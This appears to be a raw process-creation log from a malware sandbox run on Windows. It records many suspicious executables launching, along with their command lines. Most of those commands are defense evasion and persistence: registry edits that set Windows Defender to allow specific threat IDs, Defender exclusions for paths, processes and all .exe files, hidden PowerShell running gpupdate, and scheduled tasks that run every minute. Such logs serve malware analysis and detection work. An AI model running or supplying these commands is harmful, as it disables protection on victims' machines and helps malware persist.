"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2136,3796333605691665801,14238465934583101331,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2432 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,11898698046120973265,4967366158220157042,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3668 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,11898698046120973265,4967366158220157042,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3676 /prefetch:1

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Users\Admin\AppData\Roaming\configurationValue\One.exe

"C:\Users\Admin\AppData\Roaming\configurationValue\One.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Users\Admin\AppData\Local\Temp\1000047001\file300un.exe

"C:\Users\Admin\AppData\Local\Temp\1000047001\file300un.exe"

C:\Users\Admin\Desktop\a\sarra.exe

"C:\Users\Admin\Desktop\a\sarra.exe"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,11898698046120973265,4967366158220157042,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3568 /prefetch:1

C:\Windows\SysWOW64\taskkill.exe

taskkill /im "mixinte.exe" /f

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,11898698046120973265,4967366158220157042,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,11898698046120973265,4967366158220157042,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5000 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,11898698046120973265,4967366158220157042,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5156 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,11898698046120973265,4967366158220157042,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5320 /prefetch:1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 9156 -ip 9156

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\cmd.exe

/C powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 7924 -s 920

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 9156 -s 1704

C:\Users\Admin\Desktop\a\228.exe

"C:\Users\Admin\Desktop\a\228.exe"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn btZaCbGShXZoJDfvCg"

C:\Users\Admin\Desktop\a\fileosn.exe

"C:\Users\Admin\Desktop\a\fileosn.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k move Descriptions Descriptions.cmd & Descriptions.cmd & exit

C:\Windows\SysWOW64\cmd.exe

/C schtasks /run /I /tn btZaCbGShXZoJDfvCg

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Users\Admin\Desktop\a\amers.exe

"C:\Users\Admin\Desktop\a\amers.exe"

C:\Users\Admin\Desktop\a\IerLRtXpEcMnUjz.exe

"C:\Users\Admin\Desktop\a\IerLRtXpEcMnUjz.exe"

\??\c:\windows\SysWOW64\schtasks.exe

schtasks /run /I /tn btZaCbGShXZoJDfvCg

C:\Users\Admin\AppData\Local\Temp\7zS65EF.tmp\Install.exe

C:\Users\Admin\AppData\Local\Temp\7zS65EF.tmp\Install.exe PP /XafdidFSQl 385118 /S

C:\Users\Admin\Desktop\a\gold.exe

"C:\Users\Admin\Desktop\a\gold.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe

C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe

C:\Users\Admin\Desktop\a\5.exe

"C:\Users\Admin\Desktop\a\5.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 8276 -ip 8276

C:\Users\Admin\Desktop\a\Newoff.exe

"C:\Users\Admin\Desktop\a\Newoff.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 8276 -s 260

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Users\Admin\Documents\SimpleAdobe\uHNbZJI4JxwnevGgsCYWaO_A.exe

C:\Users\Admin\Documents\SimpleAdobe\uHNbZJI4JxwnevGgsCYWaO_A.exe

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Newoff.exe /TR "C:\Users\Admin\Desktop\a\Newoff.exe" /F

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"

C:\Windows\SysWOW64\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Desktop\a\IerLRtXpEcMnUjz.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\DzmQEVPXhX.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DzmQEVPXhX" /XML "C:\Users\Admin\AppData\Local\Temp\tmpD01E.tmp"

C:\Users\Admin\Desktop\a\IerLRtXpEcMnUjz.exe

"C:\Users\Admin\Desktop\a\IerLRtXpEcMnUjz.exe"

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\a\IerLRtXpEcMnUjz.exe'

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'IerLRtXpEcMnUjz.exe'

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\cmd.exe

/C powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x124,0x128,0x12c,0x120,0x130,0x7ff9fa3946f8,0x7ff9fa394708,0x7ff9fa394718

C:\Windows\SysWOW64\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9fa3946f8,0x7ff9fa394708,0x7ff9fa394718

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\cmd.exe'

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32

C:\Users\Admin\AppData\Local\Temp\1000287001\360TS_Setup_Mini_WW.exe

"C:\Users\Admin\AppData\Local\Temp\1000287001\360TS_Setup_Mini_WW.exe"

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9fa3946f8,0x7ff9fa394708,0x7ff9fa394718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9fa3946f8,0x7ff9fa394708,0x7ff9fa394718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff9fa3946f8,0x7ff9fa394708,0x7ff9fa394718

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

